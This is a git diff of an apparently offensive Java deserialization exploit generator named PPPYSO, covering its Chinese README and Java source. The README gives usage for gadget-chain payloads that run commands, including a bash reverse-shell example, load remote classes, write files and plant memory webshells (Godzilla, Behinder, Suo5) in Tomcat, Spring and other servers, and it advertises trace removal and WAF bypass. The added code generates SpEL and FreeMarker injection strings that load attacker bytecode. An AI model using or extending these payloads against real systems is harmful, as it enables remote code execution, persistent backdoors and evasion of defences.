diff --git a/README.md b/README.md
index cc72a36..abf3907 100644
--- a/README.md
+++ b/README.md
@@ -17,17 +17,23 @@ chain 概念,将 [ysoserial](https://github.com/frohoff/ysoserial) 原先的
- [x] `InvokerTransformer` 功能增强
- [x] `TemplatesImpl` JavaClass增强、AbstractTranslet 可选移除、_bytecodes 特征消除
+- [x] rome、rometools 兼容
+- [x] 修改 serialVersionUID 兼容多版本,eg. Cb 支持 [1.8.3 | 1.6 | 1.5]
- [x] 二次反序列化增强
-- [x] rome、rometools
-- [x] CB serialVersionUID 兼容
+- [x] JavaClass 信息消除:随机类名、移除源文件信息、移除源文件信息等可能暴露来源的信息。
+- [x] JDK6 兼容输出
### JavaClass 模块
基于子项目 [JavaRce](https://github.com/Whoopsunix/JavaRce) ,在实现上不同。PPPYSO 中通过动态代理的方式实现内存马,减少依赖的同时兼容
javax/jakarta 标准。JavaClass 动态类名、内存马、Rce 回显。
-- [x] Loader + Proxy,积极测试兼容中
+- [x] Loader + Proxy 积极测试兼容中
- [x] 兼容 javax/jakarta 标准
+- [x] 结果增强输出,eg. SPEL+FreeMarker
+ - [x] 高版本 JDK 下 SPEL 注入
+- [x] 功能增强积极增加中 Exec、Godzilla、Behinder、Sou5
+- [x] Unsafe 实现高版本 JDK 字节码加载兼容
### common 模板
@@ -35,7 +41,7 @@ javax/jakarta 标准。JavaClass 动态类名、内存马、Rce 回显。
- [x] 序列化:原生、XStream、HexAscii
- [x] WAF 绕过:UTF8Mix 2 3 字节加密
-- [x] 结果保存形式:文件、Base64、GZIP
+- [x] 支持组合结果输出:文件、Base64、GZIP,eg. gzip,base64
### 交互
@@ -81,8 +87,9 @@ URLDNS 支持组件利用链探测和类探测
## 组件探测
-`-dp` 指定组件,`all` 探测所有,组件探测参考 [Urldns](https://github.com/kezibei/Urldns)
-项目的实现,改了一些类可以通过 `-dp show` 展示目前规则已写的类
+组件探测参考 [Urldns ](https://github.com/kezibei/Urldns)项目实现,改了一些类可以通过 `-dp show` 展示目前规则已写的类
+
++ `-dp` 指定组件,`all` 探测所有
@@ -94,7 +101,11 @@ eg. `-g URLDNS -host 7ox24q.dnslog.cn -dp "all"`
## 类探测
-`-cn` 指定探测的全限定类名,`-ds` 指定对应的子域名
++ `-cn` 指定探测的全限定类名
++ `-ds` 指定对应的子域名
+
+
+
eg. `-g URLDNS -host 4hu16z.dnslog.cn -cn "com.ppp.DNSTest" -ds "pppyso"`
@@ -114,28 +125,34 @@ eg. `-g URLDNS -host 4hu16z.dnslog.cn -cn "com.ppp.DNSTest" -ds "pppyso"`
```
-e command
-cmd {whoami}
--cmdt {Runtime(Default)|ScriptEngine}
+-cmdt {ScriptEngine}
-split
```
-通过 `-split` 参数会将命令拆分为 `String[3]` 数组,用这个参数相当于可以指定执行命令所需的终端
++ `-cmd` 输入命令
++ `-cmdt` 命令执行类型
++ `-split` 参数会将命令拆分为 `String[3]` 数组,用这个参数相当于可以指定执行命令所需的终端
eg. `-g commonscollections1 -e command -cmd "bash -c bash -i >&/dev/tcp/ip/1234 0>&1" -split`
-通过 `-cmdt` 参数指定命令执行类型
+### ScriptEngine
+
+通过 `-cmdt` 参数指定命令执行类型为 `ScriptEngine`
eg. `-g commonscollections2 -e command -cmd "open -a Calculator.app" -cmdt ScriptEngine`
-code 也是支持自定义的
++ `-code` 支持自定义 js 语句
+
eg. `-g commonscollections2 -e command -cmdt ScriptEngine -code "x=new java.lang.ProcessBuilder;x.command('open','-a','Calculator.app');x.start();"`
-`InvokerTransformer` 增强的链支持使用 `-cf` 从文件中获取复杂语句
++ `-cf` 对于`InvokerTransformer` 增强的链支持从文件中获取复杂语句
+
eg. `-g commonscollections2 -e command -cmdt ScriptEngine -cf code.txt`
@@ -147,7 +164,7 @@ eg. `-g commonscollections2 -e command -cmdt ScriptEngine -cf code.txt`
-dt {/s}
```
-通过 `-dt` 指定延时时间 /s
++ `-dt` 指定延时时间 /s
eg. `-g commonscollections2 -e delay -dt 5`
@@ -160,7 +177,7 @@ eg. `-g commonscollections2 -e delay -dt 5`
-host {ip:port}
```
-通过 `-host` 指定需要发起 socket 请求的地址,用来测试是调用链被 ban 了还是限制了执行命令。
++ `-host` 指定需要发起 socket 请求的地址,用来测试是调用链被 ban 了还是限制了执行命令。
eg. `-g commonscollections2 -e socket -host 127.0.0.1:1234`
@@ -175,13 +192,14 @@ eg. `-g commonscollections2 -e socket -host 127.0.0.1:1234`
-ctor
```
-通过 `-url` 指定远程地址,`-cn` 指定远程加载的类名
++ `-url` 指定远程地址
++ `-cn` 指定远程加载的类名
eg. `-g commonscollections2 -e RemoteLoad -url http://127.0.0.1:1234/ClassLoad-1.0.jar -cn org.example.Exec`
-eg. 如何远程加载的类构造方法需要参数,可以通过 `-ctor` 指定,支持 `Int | String` 类型
++ `-ctor` 指定需要参数的构造方法,支持 `Int | String` 类型
@@ -197,7 +215,10 @@ eg. 如何远程加载的类构造方法需要参数,可以通过 `-ctor` 指
-part
```
-通过 `-sfp` 指定写入远程文件的地址,`-fc` 指定需要写入的内容,或者通过 `-lfp` 从本地读取文件,`-append` 追加写入文件。
++ `-sfp` 指定写入远程文件的地址
++ `-fc` 指定需要写入的内容
++ `-lfp` 从本地读取文件
++ `-append` 追加写入文件
eg. `-g commonscollections1 -e FileWrite -sfp /tmp/1.jsp -fc 123456`
@@ -218,7 +239,7 @@ eg. `-g commonscollections1 -e FileWrite -sfp /tmp/itest -lfp /tmp/iox -split -p
## 继承 AbstractTranslet
-通过 `-ext` 参数指定 `TemplatesImpl` 增强的类继承 AbstractTranslet
++ `-ext` 参数指定 `TemplatesImpl` 增强的类继承 AbstractTranslet
@@ -230,7 +251,7 @@ eg. `-g commonscollections1 -e FileWrite -sfp /tmp/itest -lfp /tmp/iox -split -p
-jfp {filePath}
```
-可以选择加载自定义的 JavaClass,.class 文件或者形如 `yv66vg` 开头的 base64 加密
++ `-jht Custom -jfp ` 可以选择加载自定义的 JavaClass,.class 文件或者形如 `yv66vg` 开头的 base64 加密
eg. `-g Fastjson -e JavaClass -jht Custom -jfp testms`
@@ -245,8 +266,9 @@ eg. `-g Fastjson -e JavaClass -jht Custom -jfp testms`
| Resin | [4.0.52, 4.0.66] | |
| Jetty | | |
-通过 `-jht` 参数指定为 Rce 回显,`-mw` 参数指定中间件,`-jt` 指定回显的实现方式,可通过 `AutoFind` 使用线程遍历寻找 request
-(正在针对实际环境优化中..)
++ `-e JavaClass -jht RceEcho` 指定为 Rce 回显
++ `-mw` 参数指定中间件
++ `-jt` 指定回显的实现方式,可通过 `AutoFind` 使用线程遍历寻找 request(实测优化中..)
可选参数默认都是随机生成的,也可以指定
@@ -277,7 +299,8 @@ eg. `-g commonscollections2 -e JavaClass -jht RceEcho -mw Tomcat -o base64`
-mw [Tomcat | Jetty ...]
-ms [Servlet | Listener | Filter ...]
-msf [Exec | Godzilla ...]
--jt [AutoFind | Default]
+-jt [AutoFind]
+-mt [Raw]
-fname
-fheader
@@ -289,8 +312,12 @@ eg. `-g commonscollections2 -e JavaClass -jht RceEcho -mw Tomcat -o base64`
-flv
```
-通过 `-jht` 参数指定为内存马,`-mw` 参数指定中间件,`-ms` 指定内存马类型,`-msf` 指定内存马功能,`-jt`
-指定内存马上下文的获取方式,目前计划实现自动线程遍历寻找 request,可通过 `AutoFind` 触发
++ `-e JavaClass -jht MemShell` 指定为内存马
++ `-mw` 指定中间件
++ `-ms` 指定内存马类型
++ `-msf` 指定内存马功能
++ `-jt` 指定内存马上下文的获取方式,目前计划实现自动线程遍历寻找 request,可通过 `AutoFind` 触发
++ `-mt` 指定内存马实现方式,目前只适配了 Spring Interceptor Godzilla Raw
可选参数默认都是随机生成的,也可以指定
@@ -302,22 +329,22 @@ eg. `-g commonscollections2 -e JavaClass -jht RceEcho -mw Tomcat -o base64`
- `-fpass` 指定内存马密码
- `-flk` 、`-flv` 指定触发内存马需要的 K-V 值,Contains 关系,比如 User-Agent 中需要存在 `Whoopsunix`。
-| | remarks | Exec | Godzilla | Behinder | Suo5(todo jakarta) | Version Test | Auto Version Test (正在针对实际环境优化中..) |
-|--------------------|--------------------------------|------|----------|----------|--------------------|-------------------------------------|-----------------------------------|
-| Tomcat Servlet | | ✔ | ✔ | ✔ | ✔ | 7-11 | |
-| Tomcat Filter | | ✔ | ✔ | ✔ | ✔ | 7-11 | |
-| Tomcat Listener | | ✔ | ✔ | ✔ | ✔ | 6.0.35, [7.0.59, 7.0.109], 8, 9, 10 | 5-11 |
-| Tomcat Executor | 通过 Header 交互, Thread Auto Find | ✔ | | | | 8, 9 | |
-| Tomcat Valve | 动态代理没有经过实际环境测试 | ✔ | ✔ | ✔ | | 8 | |
-| Resin Servlet | | ✔ | ✔ | ✔ | ✔ | [4.0.52, 4.0.66] | |
-| Resin Filter | | ✔ | ✔ | ✔ | ✔ | [4.0.52, 4.0.66] | |
-| Resin Listener | | ✔ | ✔ | ✔ | ✔ | [4.0.52, 4.0.66] | |
-| Jetty Listener | | ✔ | ✔ | ✔ | ✔ | 9, 10 | 7-11 |
-| Undertow Servlet | | ✔ | ✔ | ✔ | ✔ | 2.2.25.Final | |
-| Undertow Listener | | ✔ | ✔ | ✔ | ✔ | 2.2.25.Final | |
-| Undertow Filter | | ✔ | ✔ | ✔ | ✔ | 2.2.25.Final | |
-| Spring Controller | | ✔ | | | | 5.3.28 | |
-| Spring Interceptor | | ✔ | ✔ | | | 5.3.28 | |
+| | remarks | Exec | Godzilla | Behinder | Suo5(todo jakarta) | Version Test | Auto Version Test |
+| ------------------ | ---------------------------------- | ---- | -------- | -------- | ------------------ | ----------------------------------- | ----------------- |
+| Tomcat Servlet | | ✔ | ✔ | ✔ | ✔ | 7-11 | |
+| Tomcat Filter | | ✔ | ✔ | ✔ | ✔ | 7-11 | |
+| Tomcat Listener | | ✔ | ✔ | ✔ | ✔ | 6.0.35, [7.0.59, 7.0.109], 8, 9, 10 | 5-11 |
+| Tomcat Executor | 通过 Header 交互, Thread Auto Find | ✔ | | | | 8, 9 | |
+| Tomcat Valve | 动态代理没有经过实战测试 | ✔ | ✔ | ✔ | | 8 | |
+| Resin Servlet | | ✔ | ✔ | ✔ | ✔ | [4.0.52, 4.0.66] | |
+| Resin Filter | | ✔ | ✔ | ✔ | ✔ | [4.0.52, 4.0.66] | |
+| Resin Listener | | ✔ | ✔ | ✔ | ✔ | [4.0.52, 4.0.66] | |
+| Jetty Listener | | ✔ | ✔ | ✔ | ✔ | 9, 10 | 7-11 |
+| Undertow Servlet | | ✔ | ✔ | ✔ | ✔ | 2.2.25.Final | |
+| Undertow Listener | | ✔ | ✔ | ✔ | ✔ | 2.2.25.Final | |
+| Undertow Filter | | ✔ | ✔ | ✔ | ✔ | 2.2.25.Final | |
+| Spring Controller | | ✔ | | | | 5.3.28 | |
+| Spring Interceptor | | ✔ | ✔ Raw | | | 5.3.28 | |
eg. `-g commonscollections2 -e JavaClass -jht MemShell -mw Tomcat -ms Listener -msf Exec -o base64`
@@ -336,14 +363,26 @@ eg. `-g commonscollections1 -e JavaClass -jht MemShell -mw Tomcat -ms Listener -
## JavaClass 封装
-JavaClass 单独生成eg. `-e JavaClass -jht MemShell -mw Tomcat -ms Listener -msf Exec -je FreeMarker`
+JavaClass 也可以单独生成,并且提供加密封装
-
+```
+-je [Script | SPEL | FreeMarker]
+-jme [JDK17]
+```
+
++ `-je` 指定封装方式,支持组合封装 eg. `SPEL,FreeMarker`
++ `-jme` JavaClass 创建增强逻辑,之后考虑是否太麻烦了移除,目前有 SPEL JDK17 封装
+
+eg. `-e JavaClass -jht MemShell -mw Tomcat -ms Listener -msf Exec -je FreeMarker`
+
+某 FreeMarker 高版本 JDK 环境利用 `-e JavaClass -jht MemShell -mw Spring -ms Interceptor -msf Godzilla -je SPEL,FreeMarker -jme JDK17 -mt raw`
-
+
# 0x04 Common 模块
+## 输出
+
```
-o [Default | GZIP | Base64]
-st [Default | XStream | HexAscii | UTF8Mix]
@@ -351,15 +390,15 @@ JavaClass 单独生成eg. `-e JavaClass -jht MemShell -mw Tomcat -ms Listener -m
-close
```
-`-save` 指定结果输出到哪个文件
-
-`-close` 关闭除结果外的其他输出
-
-`-o` 指定输出方式,支持按顺序组合输出,eg. `-g commonscollections1 -cmd "open -a Calculator.app" -o gzip,base64`
++ `-save` 指定结果输出到哪个文件
++ `-close` 关闭除结果外的其他输出
++ `-o` 指定输出方式,支持按顺序组合输出,eg. `-g commonscollections1 -cmd "open -a Calculator.app" -o gzip,base64`
-`-st` 指定序列化输出类型,eg. `-g commonscollections1 -cmd "open -a Calculator.app" -st UTF8Mix`
+## 序列化类型
+
++ `-st` 指定序列化输出类型,eg. `-g commonscollections1 -cmd "open -a Calculator.app" -st UTF8Mix`
@@ -369,7 +408,7 @@ JavaClass 单独生成eg. `-e JavaClass -jht MemShell -mw Tomcat -ms Listener -m
## CB serialVersionUID 冲突
-通过 `-cb` 参数指定,可选 `[1.8.3 | 1.6 | 1.5]`,默认 >- 1.9.0 的 serialVersionUID
+暂时兼容CB,通过 `-cb` 参数指定,可选 `[1.8.3 | 1.6 | 1.5]`,默认 > 1.9.0 的 serialVersionUID
eg. `-g CommonsBeanutils1 -cmd "open -a Calculator.app" -cb 1.8.3`
@@ -384,7 +423,7 @@ eg. `-g CommonsBeanutils1 -cmd "open -a Calculator.app" -cb 1.8.3`
## 二次反序列化
-`-wrap` 指令进行 SignedObject 二次反序列化封装,主要还是出现在 CTF 题,所以只在 ROME 链打了个样
++ `-wrap` 指令进行 SignedObject 二次反序列化封装,主要还是出现在 CTF 题,所以只在 ROME 链打了个样
eg. `-g ROME -cmd "open -a Calculator.app" -wrap`
@@ -396,7 +435,7 @@ eg. `-g ROME -cmd "open -a Calculator.app" -wrap`
-gd [rome | rometools]
```
-通过 -gd 指定 rome 的依赖包 eg. `-g ROME -cmd "open -a Calculator.app" -gd rometools`
++ `-gd` 指定 rome 的依赖包 eg. `-g ROME -cmd "open -a Calculator.app" -gd rometools`
diff --git a/attachments/image-20240424163247305.png b/attachments/image-20240424163247305.png
deleted file mode 100644
index 4bf9e7f..0000000
Binary files a/attachments/image-20240424163247305.png and /dev/null differ
diff --git a/attachments/image-20240425092638935.png b/attachments/image-20240425092638935.png
deleted file mode 100644
index f6f9f2b..0000000
Binary files a/attachments/image-20240425092638935.png and /dev/null differ
diff --git a/attachments/image-20240504120717253.png b/attachments/image-20240504120717253.png
new file mode 100644
index 0000000..18ec8f6
Binary files /dev/null and b/attachments/image-20240504120717253.png differ
diff --git a/common/src/main/java/com/ppp/Printer.java b/common/src/main/java/com/ppp/Printer.java
index 62d8a67..2c31cb6 100644
--- a/common/src/main/java/com/ppp/Printer.java
+++ b/common/src/main/java/com/ppp/Printer.java
@@ -32,11 +32,21 @@ public static void print(Object msg) {
System.out.flush();
}
+ /**
+ * 结果输出
+ * @param msg
+ */
+ public static void result(Object msg) {
+ System.out.println(msg);
+ System.out.flush();
+ }
+
/**
* 标题
* @param msg
*/
public static void title(Object msg) {
+ msg = " " + msg + " ";
if (!isPrintEnabled())
return;
int totalLength = 50;
diff --git a/common/src/main/java/com/ppp/utils/PayloadUtils.java b/common/src/main/java/com/ppp/utils/PayloadUtils.java
index 3977a6e..1c49f62 100644
--- a/common/src/main/java/com/ppp/utils/PayloadUtils.java
+++ b/common/src/main/java/com/ppp/utils/PayloadUtils.java
@@ -4,7 +4,13 @@
* @author Whoopsunix
*/
public class PayloadUtils {
- public static String loadByScriptEngine(String b64, String loaderClassName) {
+ /**
+ * ScriptEngine
+ * @param b64
+ * @param loaderClassName
+ * @return
+ */
+ public static String script(String b64, String loaderClassName) {
String code = String.format("data=\"%s\";bytes=\"\".getBytes();" +
"try{bytes=java.util.Base64.getDecoder().decode(data);}catch(e){" +
"aClass=java.lang.Class.forName(\"sun.misc.BASE64Decoder\");" +
@@ -22,4 +28,31 @@ public static String loadByScriptEngine(String b64, String loaderClassName) {
"};", b64, loaderClassName);
return code;
}
+
+ public static String spel1(String b64, String loaderClassName) {
+ return String.format("{T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',new sun.misc.BASE64Decoder().decodeBuffer('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader()))}", loaderClassName, b64);
+ }
+
+ public static String spel(String b64, String loaderClassName) {
+// String spel = String.format("{T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader()))}", loaderClassName, b64);
+// return String.format("{T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',T(java.util.Base64).getDecoder().decode('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader()))}", loaderClassName, b64);
+ return String.format("{T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader()))}", loaderClassName, b64);
+ }
+
+ public static String spelJDK17(String b64, String loaderClassName) {
+ // 正常
+ return String.format("{T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',T(java.util.Base64).getDecoder().decode('%s'),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser'))}", loaderClassName, b64);
+
+ // urlClassLoader
+// return String.format("{T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',T(java.util.Base64).getDecoder().decode('%s'),new java.net.URLClassLoader(new java.net.URL[0], T(java.lang.Thread).currentThread().getContextClassLoader()), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser'))}", loaderClassName, b64);
+
+ // ClassLoader.getSystemClassLoader() 即 ClassLoader$AppClassLoader
+// return String.format("{T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',T(java.util.Base64).getDecoder().decode('%s'),T(java.lang.ClassLoader).getSystemClassLoader(), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser'))}", loaderClassName, b64);
+ }
+
+ public static String spelLoadClass(String loaderClassName){
+ return String.format("{T(java.lang.Thread).currentThread().getContextClassLoader().loadClass('%s').newInstance()}", loaderClassName);
+ }
+
+
}
diff --git a/gadgets/pom.xml b/gadgets/pom.xml
index 9607ab6..f5f9d25 100644
--- a/gadgets/pom.xml
+++ b/gadgets/pom.xml
@@ -24,7 +24,7 @@
com.ppp
javaClassBuilder
- 1.1.0
+ 1.2.0
diff --git a/gadgets/src/main/java/com/ppp/ObjectPayloadBuilder.java b/gadgets/src/main/java/com/ppp/ObjectPayloadBuilder.java
index 05a67dd..d4456cc 100644
--- a/gadgets/src/main/java/com/ppp/ObjectPayloadBuilder.java
+++ b/gadgets/src/main/java/com/ppp/ObjectPayloadBuilder.java
@@ -99,7 +99,7 @@ public static void save(byte[] bytes, SinksHelper sinksHelper) throws Exception
Printer.blueInfo("Output: " + Arrays.toString(output));
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
byteArrayOutputStream.write(bytes);
- System.out.println(byteArrayOutputStream);
+ Printer.result(byteArrayOutputStream);
}
// 保存文件
diff --git a/gadgets/src/main/java/com/ppp/sinks/InvokerTransformer3.java b/gadgets/src/main/java/com/ppp/sinks/InvokerTransformer3.java
index 70fc6e2..5d0be64 100644
--- a/gadgets/src/main/java/com/ppp/sinks/InvokerTransformer3.java
+++ b/gadgets/src/main/java/com/ppp/sinks/InvokerTransformer3.java
@@ -403,7 +403,7 @@ public Transformer[] JavaClass(SinksHelper sinksHelper) throws Exception {
// "clazz.newInstance();" +
// "}};", b64, className, loaderClassName);
- String code = PayloadUtils.loadByScriptEngine(b64, loaderClassName);
+ String code = PayloadUtils.script(b64, loaderClassName);
transformers = new Transformer[]{
new ConstantTransformer(ScriptEngineManager.class),
diff --git a/gadgets/src/main/java/com/ppp/sinks/InvokerTransformer4.java b/gadgets/src/main/java/com/ppp/sinks/InvokerTransformer4.java
index 0a95284..02a5df4 100644
--- a/gadgets/src/main/java/com/ppp/sinks/InvokerTransformer4.java
+++ b/gadgets/src/main/java/com/ppp/sinks/InvokerTransformer4.java
@@ -403,7 +403,7 @@ public Transformer[] JavaClass(SinksHelper sinksHelper) throws Exception {
// "clazz.newInstance();" +
// "}};", b64, className, loaderClassName);
- String code = PayloadUtils.loadByScriptEngine(b64, loaderClassName);
+ String code = PayloadUtils.script(b64, loaderClassName);
transformers = new Transformer[]{
new ConstantTransformer(ScriptEngineManager.class),
diff --git a/javaClassBuilder/pom.xml b/javaClassBuilder/pom.xml
index fb733b6..69c8331 100644
--- a/javaClassBuilder/pom.xml
+++ b/javaClassBuilder/pom.xml
@@ -4,7 +4,7 @@
com.ppp
javaClassBuilder
- 1.1.0
+ 1.2.0
jar
javaClassBuilder
diff --git a/javaClassBuilder/src/main/java/com/ppp/JavaClassAdvanceBuilder.java b/javaClassBuilder/src/main/java/com/ppp/JavaClassAdvanceBuilder.java
new file mode 100644
index 0000000..cd038e0
--- /dev/null
+++ b/javaClassBuilder/src/main/java/com/ppp/JavaClassAdvanceBuilder.java
@@ -0,0 +1,122 @@
+package com.ppp;
+
+import com.ppp.annotation.JavaClassEnhance;
+import com.ppp.annotation.JavaClassHelperType;
+import com.ppp.annotation.JavaClassMakerEnhance;
+import com.ppp.utils.PayloadUtils;
+import com.ppp.utils.maker.CryptoUtils;
+
+import java.util.HashMap;
+
+/**
+ * @author Whoopsunix
+ */
+public class JavaClassAdvanceBuilder {
+ public static HashMap results = new HashMap() {{
+ put(JavaClassEnhance.Script.getInfo(), null);
+ put(JavaClassEnhance.SPEL.getInfo(), null);
+ put(JavaClassMakerEnhance.JDK17.getInfo(), null);
+ put(JavaClassEnhance.SPELLoadClass.getInfo(), null);
+ }};
+
+ public static void builder(JavaClassHelper javaClassHelper) throws Exception {
+ /**
+ * 创建增强
+ */
+ JavaClassMakerEnhance[] javaClassMakerEnhances = javaClassHelper.getJavaClassMakerEnhances();
+ for (JavaClassMakerEnhance javaClassMakerEnhance : javaClassMakerEnhances) {
+ switch (javaClassMakerEnhance) {
+ case JDK17:
+ results.put(JavaClassMakerEnhance.JDK17.getInfo(), true);
+ javaClassHelper.setJavaClassPackageName("org.springframework.expression");
+ break;
+ }
+ }
+ }
+
+ /**
+ * 增强
+ */
+ public static void result(JavaClassHelper javaClassHelper, byte[] bytes) throws Exception {
+ JavaClassEnhance[] javaClassEnhances = javaClassHelper.getJavaClassEnhances();
+ String className = null;
+ // 内存马
+ if (javaClassHelper.getJavaClassHelperType().equals(JavaClassHelperType.MemShell)) {
+ className = javaClassHelper.getLoaderClassName();
+ } else {
+ className = javaClassHelper.getCLASSNAME();
+ }
+
+
+ String freeMakerPayload = null;
+ for (JavaClassEnhance javaClassEnhance : javaClassEnhances) {
+ switch (javaClassEnhance) {
+ case Default:
+ default:
+ break;
+ case Script:
+ String code = PayloadUtils.script(CryptoUtils.base64encoder(bytes), className);
+ results.put(JavaClassEnhance.Script.getInfo(), code);
+ Printer.title(JavaClassEnhance.Script.getInfo());
+ Printer.result(code);
+ case SPEL:
+ String spel = PayloadUtils.spel(CryptoUtils.base64encoder(bytes), className);
+ results.put(JavaClassEnhance.SPEL.getInfo(), spel);
+ Printer.title(JavaClassEnhance.SPEL.getInfo());
+ Printer.result(spel);
+
+ if (results.get(JavaClassMakerEnhance.JDK17.getInfo()) != null) {
+ String spelJDK17 = PayloadUtils.spelJDK17(CryptoUtils.base64encoder(bytes), className);
+ results.put(JavaClassMakerEnhance.JDK17.getInfo(), spelJDK17);
+ Printer.title(JavaClassMakerEnhance.JDK17.getInfo());
+ Printer.result(spelJDK17);
+ }
+
+ String spelLoadClass = PayloadUtils.spelLoadClass(className);
+ results.put(JavaClassEnhance.SPELLoadClass.getInfo(), spelLoadClass);
+ Printer.title(JavaClassEnhance.SPELLoadClass.getInfo());
+ Printer.result(spelLoadClass);
+
+
+ break;
+ case FreeMarker:
+ freeMarkerBuilder();
+
+// if (spel2 != null) {
+// Printer.title("SPEL java.util.Base64");
+// freeMakerPayload = String.format("${\"freemarker.template.utility.ObjectConstructor\"?new()(\"org.springframework.expression.spel.standard.SpelExpressionParser\").parseExpression(\"%s\").getValue()}", spel2);
+// Printer.result(freeMakerPayload);
+// }
+
+
+ // CVE-2023-4450
+// String codec = PayloadUtils.script(CryptoUtils.base64encoder(bytes), className).replaceAll("\"", "\\\\\"");
+// String freeMakerPayload = String.format("{\"sql\":\"call${\\\"freemarker.template.utility.ObjectConstructor\\\"?new()(\\\"javax.script.ScriptEngineManager\\\").getEngineByName(\\\"js\\\").eval('%s#{1};')}\",\"dbSource\":\"\",\"type\":\"0\"}", codec);
+
+// Printer.print(freeMakerPayload);
+ }
+ }
+
+
+ }
+
+ public static void freeMarkerBuilder() {
+ Printer.title(JavaClassEnhance.FreeMarker.getInfo());
+ for (String key : results.keySet()) {
+ if (results.get(key) == null) {
+ continue;
+ }
+
+ Printer.title(key);
+ if (key.equals(JavaClassMakerEnhance.JDK17.getInfo()) || key.equals(JavaClassEnhance.SPEL.getInfo()) || key.equals(JavaClassEnhance.SPELLoadClass.getInfo())) {
+ String freeMakerPayload = String.format("${\"freemarker.template.utility.ObjectConstructor\"?new()(\"org.springframework.expression.spel.standard.SpelExpressionParser\").parseExpression(\"%s\").getValue()}", results.get(key));
+ Printer.result(freeMakerPayload);
+ }
+
+ if (key.equals(JavaClassEnhance.Script.getInfo())) {
+ String freeMakerPayload = String.format("{\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval('%s')}", results.get(key));
+ Printer.result(freeMakerPayload);
+ }
+ }
+ }
+}
diff --git a/javaClassBuilder/src/main/java/com/ppp/JavaClassBuilder.java b/javaClassBuilder/src/main/java/com/ppp/JavaClassBuilder.java
index 625f268..5589c68 100644
--- a/javaClassBuilder/src/main/java/com/ppp/JavaClassBuilder.java
+++ b/javaClassBuilder/src/main/java/com/ppp/JavaClassBuilder.java
@@ -1,8 +1,7 @@
package com.ppp;
-import com.ppp.annotation.JavaClassEnhance;
import com.ppp.annotation.JavaClassHelperType;
-import com.ppp.utils.PayloadUtils;
+import com.ppp.annotation.JavaClassMakerEnhance;
import com.ppp.utils.Reflections;
import com.ppp.utils.maker.ClassUtils;
import com.ppp.utils.maker.CryptoUtils;
@@ -22,8 +21,10 @@ public class JavaClassBuilder {
public static byte[] build(JavaClassHelper javaClassHelper) throws Exception {
String javaClassHelperType = javaClassHelper.getJavaClassHelperType();
String javaClassFilePath = javaClassHelper.getJavaClassFilePath();
- byte[] bytes = new byte[0];
+ JavaClassAdvanceBuilder.builder(javaClassHelper);
+
+ byte[] bytes = new byte[0];
if (javaClassHelperType.equals(JavaClassHelperType.Custom)) {
try {
Printer.yellowInfo("load JavaClass from file: " + javaClassFilePath);
@@ -56,39 +57,11 @@ public static byte[] build(JavaClassHelper javaClassHelper) throws Exception {
bytes = (byte[]) Reflections.invokeMethod(builderClass.newInstance(), "build", javaClassHelper);
}
- advance(javaClassHelper, bytes);
+ /**
+ * 输出增强
+ */
+ JavaClassAdvanceBuilder.result(javaClassHelper, bytes);
return bytes;
-
- }
-
- /**
- * 增强
- */
- public static void advance(JavaClassHelper javaClassHelper, byte[] bytes) throws Exception {
- JavaClassEnhance javaClassEnhance = javaClassHelper.getJavaClassEnhance();
- switch (javaClassEnhance) {
- case Default:
- default:
- break;
- case FreeMarker:
- String codeClassName = null;
- // 内存马
- if (javaClassHelper.getJavaClassHelperType().equals(JavaClassHelperType.MemShell)) {
- codeClassName = javaClassHelper.getLoaderClassName();
- } else {
- codeClassName = javaClassHelper.getCLASSNAME();
- }
-
- // todo
- String freeMakerPayload = String.format("{\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval('%s')}", PayloadUtils.loadByScriptEngine(CryptoUtils.base64encoder(bytes), codeClassName));
-
- // CVE-2023-4450
-// String codec = PayloadUtils.loadByScriptEngine(CryptoUtils.base64encoder(bytes), codeClassName).replaceAll("\"", "\\\\\"");
-// String freeMakerPayload = String.format("{\"sql\":\"call${\\\"freemarker.template.utility.ObjectConstructor\\\"?new()(\\\"javax.script.ScriptEngineManager\\\").getEngineByName(\\\"js\\\").eval('%s#{1};')}\",\"dbSource\":\"\",\"type\":\"0\"}", codec);
-
- Printer.print(freeMakerPayload);
- }
}
-
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/JavaClassHelper.java b/javaClassBuilder/src/main/java/com/ppp/JavaClassHelper.java
index 978409b..5fd8cf1 100644
--- a/javaClassBuilder/src/main/java/com/ppp/JavaClassHelper.java
+++ b/javaClassBuilder/src/main/java/com/ppp/JavaClassHelper.java
@@ -1,8 +1,9 @@
package com.ppp;
import com.ppp.annotation.JavaClassEnhance;
+import com.ppp.annotation.JavaClassMakerEnhance;
import com.ppp.annotation.JavaClassType;
-import com.ppp.utils.RanDomUtils;
+import com.ppp.annotation.MemShellType;
/**
* @author Whoopsunix
@@ -28,7 +29,12 @@ public class JavaClassHelper {
/**
* 增强输出
*/
- private JavaClassEnhance javaClassEnhance;
+ private JavaClassEnhance[] javaClassEnhances;
+ /**
+ * 创建增强
+ */
+ private JavaClassMakerEnhance[] javaClassMakerEnhances;
+
/**
* 内存马
*/
@@ -38,21 +44,22 @@ public class JavaClassHelper {
private String memShell;
// 内存马功能
private String memShellFunction;
+ private String memShellType;
/**
* 以下为内存马可自定义信息
*/
- private String NAME = "Whoopsunix";
- private String HEADER = "X-Token";
- private String RHEADER = "XXX";
+ private String NAME;
+ private String HEADER;
+ private String RHEADER;
